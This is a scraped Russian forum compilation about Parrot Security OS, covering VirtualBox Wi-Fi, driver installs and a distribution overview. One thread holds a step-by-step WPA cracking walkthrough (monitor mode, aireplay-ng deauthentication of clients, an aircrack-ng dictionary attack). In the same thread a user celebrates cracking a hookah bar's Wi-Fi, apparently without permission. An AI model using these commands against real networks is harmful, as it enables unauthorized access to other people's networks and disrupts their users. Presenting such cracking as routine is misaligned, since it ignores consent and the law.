- Как настроить WiFi в виртуальной коробке Parrot Security OS?
- 1 ответ 1
- Взлом Wi-Fi, неудачи на Parrot OS. В чём проблема?
- baskervillyy
- Valkiria
- baskervillyy
- Valkiria
- baskervillyy
- Valkiria
- baskervillyy
- Valkiria
- baskervillyy
- explorer_traveler
- Установка внешнего wi-fi адаптера на Parrot OS
- Консоль вместо выбора опций при установке Parrot OS
- Проблемы с Virtual Box.
- Помогите с Parrot Securitu OS, пожалуйста
- VM Parrot 4.6 работа firefox через Proxychains-NG
- Parrot OS — как проверить подлинность скачанного файла инсталляции iso ?
- Parrot Security OS — альтернатива Kali Linux
- Parrot Security OS
- Развитие проекта
Как настроить WiFi в виртуальной коробке Parrot Security OS?
Я недавно установил PSOS (ОС Parrot Security) в Virtual Box, но теперь я не могу получить WiFi на VB. Я использую Ubuntu в качестве основной ОС и Parrot в качестве моего VB.
1 ответ 1
Virtualbox создал виртуальный компьютер внутри вашего хоста Ubuntu, и, как виртуальный компьютер, он виртуализировал все свое оборудование, включая сетевую карту
virtualbox создает виртуальную сетевую карту (например, виртуальный Ethernet-кабель), подключенную к виртуальной машине и NAT за соединением, которое уже установлено вашим хостом Ubuntu
вы не можете использовать свою карту Wi-Fi непосредственно в вашей виртуальной машине, так как невозможно заставить две операционные системы использовать одно и то же устройство одновременно
Единственное решение — выполнить сквозную передачу pci/usb, это означает, что набор микросхем wifi будет отсоединен от ubuntu и подключен к виртуальной машине (поддерживая хост ubuntu в автономном режиме и предоставляя попугайкам возможность сканировать сети Wi-Fi, перехватывать трафик и беспроводное тестирование)
Другое решение состоит в том, чтобы купить внешний ключ Wi-Fi и подключить его к виртуальной машине с помощью USB-подключения, если у вас его еще нет и вам нужно его купить (и если вы намерены провести тесты безопасности беспроводных сетей), тогда официальный Портал документации Parrot предлагает список устройств с некоторыми наборами микросхем с полной поддержкой прослушивания / инъекции (https://docs.parrotsec.org/doku.php/supported-wifi-devices).
лучшим должен быть TP-LINK TL-WN722N
есть другое решение, которое вы можете попробовать
virtualbox создает виртуальную сеть NAT для вашей виртуальной машины, это означает, что виртуальная машина может иметь доступ к Интернету, но не к вашей локальной сети (LAN)
если вы измените настройку своей виртуальной машины с «NAT» на «мост», то ваша виртуальная машина сможет видеть все другие машины в вашей локальной сети (но, конечно, здесь нет тестирования беспроводной сети)
Источник
Взлом Wi-Fi, неудачи на Parrot OS. В чём проблема?
baskervillyy
Member
Valkiria
На первой картинке тебя просят:
1. Убить все процессы, которые могут помешать работе программы airmon-ng.
# airmon-ng check kill
или убей все процессы, номера которых указаны
# kill 658 663 664 673 893
2. Установить hcxpcaptool
# apt-get update
# apt-get install hcxpcaptool
Если ты установил эту софтину, то значит установка прошла некорректно.
На второй картинке сообщение о том, что программы pyrit и aircrack-ng посчитали твоё рукопожатие невалидным, а cowpatty не нашла подходящего пароля в твоём словаре. Рукопожатие не расшифровано. Меняй словарь. Но скорее всего, твоё рукопожатие — не валидно.
Как ты сделал себе такой красочный эмулятор терминала ? Редактировал
/.bashrc ? Где брал содержание этого файла ?
baskervillyy
Member
На первой картинке тебя просят:
1. Убить все процессы, которые могут помешать работе программы airmon-ng.
# airmon-ng check kill
или убей все процессы, номера которых указаны
# kill 658 663 664 673 893
2. Установить hcxpcaptool
# apt-get update
# apt-get install hcxpcaptool
Если ты установил эту софтину, то значит установка прошла некорректно.
На второй картинке сообщение о том, что программы pyrit и aircrack-ng посчитали твоё рукопожатие невалидным, а cowpatty не нашла подходящего пароля в твоём словаре. Рукопожатие не расшифровано. Меняй словарь. Но скорее всего, твоё рукопожатие — не валидно.
Как ты сделал себе такой красочный эмулятор терминала ? Редактировал
/.bashrc ? Где брал содержание этого файла ?
Valkiria
Я знаю точно, что в любом дистрибутиве можно сделать терминал вот таким красочным. У меня было решение. Но — в прошлом )) Вчера установила себе debian и допиливаю. В эмуляторе не могу добиться желаемой картинки ))
Я думаю, что дело у тебя не только в словаре. Твоё рукопожатие — не валидно. Посмотри выше, я заранее предупреждала, что оно заведомо в твоих условиях будет содержать много мусора или будет не валидным. Программа pyrit не только брутит хэндшейк, но и проверяет его на валидность. Она и сообщила тебе о невалидности.
Не работай в области вардрайвинга на автоматах типа аиргеддон, вафайти и подобных. Они — блеф, иллюзия успеха. Если хочешь успеха, то во всём придётся разобраться в ручном режиме.
baskervillyy
Member
Я знаю точно, что в любом дистрибутиве можно сделать терминал вот таким красочным. У меня было решение. Но — в прошлом )) Вчера установила себе debian и допиливаю. В эмуляторе не могу добиться желаемой картинки ))
Я думаю, что дело у тебя не только в словаре. Твоё рукопожатие — не валидно. Посмотри выше, я заранее предупреждала, что оно заведомо в твоих условиях будет содержать много мусора или будет не валидным. Программа pyrit не только брутит хэндшейк, но и проверяет его на валидность. Она и сообщила тебе о невалидности.
Не работай в области вардрайвинга на автоматах типа аиргеддон, вафайти и подобных. Они — блеф, иллюзия успеха. Если хочешь успеха, то во всём придётся разобраться в ручном режиме.
Valkiria
baskervillyy
Member
Первый успех. Спасибо за помощь, друзья. Кальянная пробита и расшифрована!)
Valkiria
baskervillyy
Member
explorer_traveler
baskervillyy: для того, что-бы понять базовые принципы взлома Wi-Fi *(самых распространённых векторов атак) нужно изучить инструменты airmon-ng, airodump-ng, aircrack-ng, aireplay-ng. С ними поймёшь азы. Все вышеперечисленные в ветке инструменты — скрипты для автоматизации работы этой чётвёрки (ну не считая reaver для атаки Pixie Dust и подбора пина для WPS).
Как по мне, лучший начальный инструмент автоматизации атак на Wi-Fi сети — это wifite.
Немного мануала от меня по киту-airmon-ng, airodump-ng, aircrack-ng, aireplay-ng:
Команды в первом терминале:
airmon-ng start wlan0 #интерфейс должен стать на wlan0mon
airodump-ng wlan0mon #выбираешь атакуемую точку доступа (и одного из клиентов на ней, что не обязательно, но желательно)
airodump-ng —bssid 00:00:00:00:00:00 -c 1 —write ./Desktop/ wlan0mon # -с 1 = канал точки доступа из airodump-ng
Команды во втором терминале:
aireplay-ng —deauth 30 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 wlan0mon #топим соединение между хабом и клиенитом deauth пакетами (-a = точка доступа, -c один из клиентов на этой точке)
Ожидаем WPA handshake в окне первого терминала («Waiting for WPA handshake 00:00:00:00:00:00»)
Когда handshake словлен открывает третий терминал.
Команды в третьем терминале:
aircrack-ng -w ‘./Desktop/vocabulary_top100.txt’ -b 00:00:00:00:00:00 ‘./Desktop/-01.cap’ #собственно, сам подбор по словарю (-w = путь к словарю, -b = MAC адрес атакуемой точки доступа)
Смотрим в терминал, завариваем кофе, чувствуем себя начинающим пентестером и ждём сообщения «KEY FOUND! [qwerty]»
Источник
Установка внешнего wi-fi адаптера на Parrot OS
Доброго времени суток. Приобрел на днях внешний wi-fi адаптер к ноутбукe c Parrot OS (TPLink tl-wn722n второй версии). Использовал следующие команды:
sudo apt update sudo apt upgrade sudo apt install bc sudo apt install build-essential sudo apt install libelf-dev sudo apt install linux-headers-$(uname -r) sudo apt install dkms
Все они проходят без каких-либо проблем, но дальше происходит следующее:
sudo rmmod r8188eu.ko rmmod: ERROR: Module r8188eu is not currently loaded
После чего я естественно пытаюсь его установить:
git clone https:github.com/lwfinger/rtl8188eu
Все проходит успешно. Но повторная попытка в эрмэмод приводит к все тому же результату. Что следует сделать? Заранее спасибо за ответ.
Консоль вместо выбора опций при установке Parrot OS
Помогите, пожалуйста. При установке Parrot Security OS вместо выбора опций (типо Install, Live mode и т.д.) отображается только консоль. Что делать??
Проблемы с Virtual Box.
Уважаемое сообщество сего форума, столкнулся с проблемой в Virtual Box.
Пользуюсь OS Parrot, т.к. она на debian 10 скачал программу с оф. сайта.
Если точнее этот файл Debian 10
Устанавливал не через консоль, поэтому если и были ошибки я о них не знаю, кроме одной. virtualbox-dkms не встаёт что бы я с ним не делал. Перелопатил всевозможные форумы, ничего не помогло.
При установке появляется подобная ошибка
так же при запуске VB в консоли появляется такое сообщение
Ну и как сказано в «сообщении» ВМ запустить не получается, появляются две ошибки:
Второй день голову ломаю, поискал на форумах ничего, покорно прошу вашей помощи.
P.S. Прошу простить за орфографию и оформление, впервые пишу здесь.
Помогите с Parrot Securitu OS, пожалуйста
Вобщем поставил себе Parrot с офф. сайта. Поставил как основную оС. После установки и перезапуска тупо черный экран и мигающий прочерк. Помогите решить эту проблему пожалуйста. И подскажите как включить Repair Mod
VM Parrot 4.6 работа firefox через Proxychains-NG
Здравствуйте уважаемая публика. Кто работал в Parrot подскажите. Ситуация такая. Я пробовал работать в Kali в Firefox через Proxychains а вот в Parrot nmap значит работает, пробиваю свой IP тоже все ок, как только запускаю команду или все запускается только ничего не работает. Выкладка терминалки:
proxychains4 firefox 2ip.ru [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/libproxychains4.so Reading profile /etc/firejail/firefox.profile Reading profile /etc/firejail/firefox-common.profile Reading profile /etc/firejail/disable-common.inc Reading profile /etc/firejail/disable-devel.inc Reading profile /etc/firejail/disable-interpreters.inc Reading profile /etc/firejail/disable-programs.inc Reading profile /etc/firejail/whitelist-common.inc Reading profile /etc/firejail/whitelist-var-common.inc Switching to pid 6873, the first child process inside the sandbox Child process initialized in 11.20 ms Error: cannot read UID_MIN and/or GID_MIN from /etc/login.defs, using 1000 by default Error: cannot read UID_MIN and/or GID_MIN from /etc/login.defs, using 1000 by default Warning: an existing sandbox was detected. /usr/bin/firefox-esr will run without any additional sandboxing features
Народ! Помогите, подскажите!
Parrot OS — как проверить подлинность скачанного файла инсталляции iso ?
Источник
Parrot Security OS — альтернатива Kali Linux
Parrot Security OS — набирающий популярность security-дистрибутив, основанный на Debian-linux. Простой в освоении, подходит и для новичков и для профессионалов. В этой статье я расскажу об этом дистрибутиве и о развитии проекта от одного из контрибьюторов M. Emrah ÜNSÜR с которым мне удалось пообщаться.
Parrot Security OS
Набирающий популярность security-дистрибутив, основанный на Debian-linux. Довольно простой в освоении, подходит и для новичков и для профессионалов. Этот дистрибутив нацелен как на проведение тестирования на проникновение, так и на анонимную работу в сети Интернет.
Довольно легкий и эффективный инструмент, многие security специалисты нашли в нем замену все более «прожорливому» Kali, тем более что Parrot использует репозитории Kali для обновления. Использует оболочку MATE и дисплей-менеджер LightDM.
По фукнционалу он похож на Kali Linux, здесь тоже вместе с системой поставляется огромное количество специального программного обеспечения для тестирования безопасности.
Из отличительных особенностей можно назвать больший, нежели в Kali, уклон в анонимность: интеграция I2P (invisible internet project) и предустановленные сервисы TOR.
Существует несколько версий (включающих 32 и 64 битные платформы) Parrot Security OS (3.8 — JollyRoger):
- Parrot Security 3.8 Full Edition — полная версия.
- Parrot Lite 3.8 Home Edition — без утилит, как основа для вашей сборки.
- Parrot AIR 3.8 — для тестирования беспроводных сетей.
- Parrot Cloud Edition — версия для деплоя в облачных сервсиах.
- Embedded Devices and IoT — Raspberry Pi, Orange Pi, Pine64.
Развитие проекта
Данный дистрибутив выглядит довольно перспективным, поэтому мне захотелось узнать о нем немного больше и я пообщался с одним из контрибьюторов и активным участником проекта — M. Emrah ÜNSÜR.
M. Emrah ÜNSÜR (meu @ Parrot Project) исследователь по безопасности в частной компании. Является контрибьютором и модератором форума проекта Parrot.
Команда состоит из добровольцев, которые в основном разделены на тех, кто занимается сообществом
и тех, кто пишет код. Команда Parrot OS всегда рада новым участникам:
- Официальная веб-страница проекта Parrot: www.parrotsec.org
- Сообщество (форум): community.parrotsec.org
- Список послов проекта Parrot: docs.parrotsec.org/community/ambassadors-list
- Местные сообщества проекта Parrot: docs.parrotsec.org/community#local-communities
- Telegram (ParrotSec Global): t.me/parrotsecgroup
Зачем создавать свой дистрибутив? Есть несколько причин сделать что-то подобное. Основная причина заключается в том, чтобы по рукой всегда было большинство используемых программных продуктов в самой удобной упаковке. В случае Parrot Security OS разработчиков по той или иной причини не устраивали текущие дистрибутивы, в виде простой и готовой к использованию сборки, с постоянными обновлениями, современными технологиями и актуальным списком ПО, которое реально используется при проведении пентеста. (Самое время вспонимть BlackArch c > 1500 утилит). Также этот дистрибутив должен подходить для повседневной работы.
Для тех, кто жалуется на фрагментацию проектов, есть информация о том, как работают сообщества с открытым исходным кодом: фрагментация вызывает диверсификацию и свободное выражение идей от других команд аналогичных проектов. Также в рамках работы над проектом ведется сотрудничество
Debian pkg-security.
В планах по развитию — создание полного пула документов и текстовых книг по разработке, системному администрированию, сетевому взаимодействию, криптографии, анализу вредоносных программ, пентестингу и т. д. Еще один вектор развития — это поддержка новых встроенных устройств. Также, основная проблема — аппаратная совместимость — требует много усилий, и в планах по развитию — привлечение новых членов сообщества, знающих Python, C, Bash.
Источник